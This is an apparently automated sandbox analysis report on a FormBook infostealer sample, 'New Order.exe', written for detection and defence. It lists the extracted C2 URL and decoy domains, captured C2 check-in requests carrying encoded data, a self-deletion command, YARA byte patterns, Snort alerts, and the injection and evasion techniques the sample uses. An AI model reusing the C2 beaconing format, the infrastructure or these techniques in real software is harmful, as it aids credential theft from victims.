Windows Analysis Report New Order.exe

Overview

General Information

Sample Name: New Order.exe
Analysis ID: 438531
MD5: 4af03301316c984c17ca822456b6d918
SHA1: ad237296e61bde6fe8ba894ec7445bb9bc76ab69
SHA256: ac339f7ecac47cfc3a860ad42986d9f8d68208e7c7df8b21d4640ade4f2b5131
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Order.exe (PID: 7044 cmdline: 'C:\Users\user\Desktop\New Order.exe' MD5: 4AF03301316C984C17CA822456B6D918)
    • New Order.exe (PID: 7108 cmdline: 'C:\Users\user\Desktop\New Order.exe' MD5: 4AF03301316C984C17CA822456B6D918)
  • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • wscript.exe (PID: 5884 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 6416 cmdline: /c del 'C:\Users\user\Desktop\New Order.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.achainz.com/de52/"], "decoy": ["securenotifications.com", "queenannedelights.com", "ametistadigital.com", "nebraskapaymentrelief.net", "biologicsas.com", "vidalifegroupeurope.com", "sedulabs.com", "relaxingread.com", "oucompany.com", "ty-valve.com", "noakum.com", "neuralinkages.com", "heirsfriend.net", "collectordrive.com", "holidayrefers.com", "rhodessunbed.com", "smartlearningservice.com", "gangju123.com", "yymh8826.com", "ssmgaezp.icu", "nagosemo.store", "czzubniimplantaty.com", "cuttingemporium.com", "sapphireresortapts.com", "thingsnice.com", "occasionalassistant.com", "dietsz.com", "agenciaay.com", "sahaazancosmetics.com", "citizenshipswap.com", "tarjetasbogota.com", "naughtyofficegirls.today", "pamcakedesigns.com", "mytopshelfcloset.com", "optimismactivism.com", "ecard07.com", "ravexim3.com", "1677onyx.com", "blossomkc.com", "havdalahwomen.com", "centraldot.xyz", "runtilltheresnone.com", "alisonhahn.com", "mikesyardsale.com", "ayanmobile.com", "riseframework.com", "intermittentfastingcbd.com", "fahn555.icu", "triumphosophy.com", "mns6238.com", "sallyta.com", "miqr.art", "canadance.net", "poisedbylanaburroughs.com", "artistasmarbella.com", "multimater.info", "trapapa-bitter-nr1-bb.com", "naijadelivery.com", "365killoffices.xyz", "cmvtholiday.taipei", "bespokephysicaltherapy.com", "candlewands.com", "tabakico.com", "domentemenegi39.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.New Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.New Order.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.New Order.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
2.1.New Order.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.New Order.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: New Order.exe | ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: New Order.exe | Joe Sandbox ML: detected
Source: 5.2.wscript.exe.34180a8.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.wscript.exe.5957960.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.New Order.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.New Order.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.New Order.exe.22a0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: New Order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscript.pdbGCTL | source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: New Order.exe, 00000000.00000003.641817824.0000000009770000.00000004.00000001.sdmp, New Order.exe, 00000002.00000002.690473130.0000000000BC0000.00000040.00000001.sdmp, wscript.exe, 00000005.00000002.901871458.0000000005420000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: New Order.exe, wscript.exe
Source: Binary string: wscript.pdb | source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\New Order.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49778 -> 35.209.88.35:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.achainz.com/de52/
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT HTTP/1.1; Host: www.collectordrive.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT HTTP/1.1; Host: www.dietsz.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT HTTP/1.1; Host: www.gangju123.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT HTTP/1.1; Host: www.ayanmobile.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT HTTP/1.1; Host: www.securenotifications.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT HTTP/1.1; Host: www.cuttingemporium.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT HTTP/1.1; Host: www.optimismactivism.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT HTTP/1.1; Host: www.occasionalassistant.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 208.91.197.91
Source: Joe Sandbox View | ASN Name: TELECOM-HKHongKongTelecomGlobalDataCentreHK
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown | DNS traffic detected: queries for: www.collectordrive.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Tue, 22 Jun 2021 16:06:46 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; X-Httpd: 1; Host-Header: 6b7412fb82ca5edfd0917e3957f05d89; X-Proxy-Cache: MISS; X-Proxy-Cache-Info: 0 NC:000000 UP:; Data Raw: (hex dump of the chunked HTML 404 page body omitted)
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: New Order.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New Order.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.648249693.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000005.00000002.902285037.0000000005AD2000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same memory dumps and unpacked PEs listed under AV Detection above

System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: New Order.exe
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004182EF NtClose,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041839F NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C297A0 NtUnmapViewOfSection,LdrInitializeThunk,
